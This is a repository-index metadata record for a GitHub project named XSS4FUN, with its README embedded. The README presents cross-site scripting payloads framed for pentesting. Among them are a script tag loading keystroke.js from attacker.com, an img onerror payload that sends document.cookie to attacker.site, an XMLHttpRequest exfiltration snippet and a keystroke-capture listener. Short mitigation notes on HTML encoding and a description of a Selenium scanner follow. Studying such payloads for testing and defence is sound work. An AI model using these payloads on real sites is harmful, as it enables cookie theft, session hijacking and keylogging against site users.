{"id":19350020,"url":"https://github.com/p1ngul1n0/xss4fun","last_synced_at":"2026-04-02T01:47:53.413Z","repository":{"id":114763056,"uuid":"246896942","full_name":"p1ngul1n0/XSS4FUN","owner":"p1ngul1n0","description":"XSS payloads just for fun.","archived":false,"fork":false,"pushed_at":"2021-04-25T01:29:42.000Z","size":34,"stargazers_count":6,"open_issues_count":0,"forks_count":2,"subscribers_count":0,"default_branch":"master","last_synced_at":"2025-10-24T15:57:08.895Z","etag":null,"topics":["cross-site-scripting","pentest","pentesting","web","xss"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/p1ngul1n0.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-03-12T17:47:47.000Z","updated_at":"2025-04-03T19:50:46.000Z","dependencies_parsed_at":"2023-04-08T21:01:06.332Z","dependency_job_id":null,"html_url":"https://github.com/p1ngul1n0/XSS4FUN","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/p1ngul1n0/XSS4FUN","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/p1ngul1n0%2FXSS4FUN","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/p1ngul1n0%2FXSS4FUN/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/p1ngul1n0%2FXSS4FUN/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/p1ngul1n0%2FXSS4FUN/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/p1ngul1n0","download_url":"https://codeload.github.com/p1ngul1n0/XSS4FUN/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/p1ngul1n0%2FXSS4FUN/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":31294159,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-02T01:43:37.129Z","status":"ssl_error","status_checked_at":"2026-04-02T01:43:36.474Z","response_time":53,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cross-site-scripting","pentest","pentesting","web","xss"],"created_at":"2024-11-10T04:29:12.860Z","updated_at":"2026-04-02T01:47:53.395Z","avatar_url":"https://github.com/p1ngul1n0.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# XSS4FUN :cookie:\nCross-Site-Scripting just for fun.\n\n## Cross-Site-Scripting Utils:\n  - Steal cookies for session hijacking.\n  - Modify the web page to perform phishing.\n  - Inject malicious code.\n## Basic payloads:\n  - \u003cscript\u003ealert(1)\u003c/script\u003e\n\n## Useful payloads:\n  - **\u003cscript src=https://attacker.com/keystroke.js \u003e \u003c/script\u003e**\n    - To include malicious JavaScript code in the page.\n  - **\\\u003cimg src=anything onerror=alert(1) \u003e**\n    - When **\u003cscript\u003e** tags are filtered by the web application, you can use JavaScript event handlers instead.\n  - **\u003cscript\u003ealert(localStorage.getItem('salary'))\u003c/script\u003e**\n    - To collect sensitive information stored in the browser's Local Storage.\n  - **\u003cimg src=error onerror=this.src='http://attacker.site/collector.php?data='+document.cookie \u003e**\n    - This payload starts a loop: the new src also fails to load as an image, so onerror fires again and the browser keeps sending requests to the attacker server with the cookie.\n\n## Useful JavaScript snippets:\n  - To perform an HTTP GET request\n  ```\n  var xhttp = new XMLHttpRequest(); // Init xhttp object\n  xhttp.open(\"GET\", \"https://attacker.site/strokes.php?data=\" + data, true); // Asynchronous GET request; data is assumed to be defined elsewhere\n  xhttp.send(); // Send request\n  ```\n  - Collect pressed keys\n  ```\n  var pressed_key;\n  document.addEventListener(\"keydown\", function(e) {\n    pressed_key = e.key; // Store the last pressed key\n  });\n  ```\n## Mitigations\n  ### PHP\n  Use **htmlspecialchars** to convert special characters to HTML entities.\n  ```\n  $word = htmlspecialchars($_GET['word']);\n  ```\n  ### ASP.NET\n  Use **HtmlEncode** to convert special characters to HTML entities.\n  ```\n  user_input = System.Web.HttpUtility.HtmlEncode(user_input);\n  ```\n  So this **\u003cscript\u003ealert(1)\u003c/script\u003e** becomes this **\\\u0026lt;script\\\u0026gt;alert(1)\\\u0026lt;/script\\\u0026gt;**\n\n## Automated Detection\n  ### xss4fun.py\n  Uses Selenium to find input fields and inject payloads; if an injection succeeds, a screenshot is taken.\n\n## References\n - ASP.NET Server.HTMLEncode: https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525347%28v%3dvs.90%29\n - PHP htmlspecialchars: https://www.php.net/manual/en/function.htmlspecialchars.php\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fp1ngul1n0%2Fxss4fun","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fp1ngul1n0%2Fxss4fun","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fp1ngul1n0%2Fxss4fun/lists"}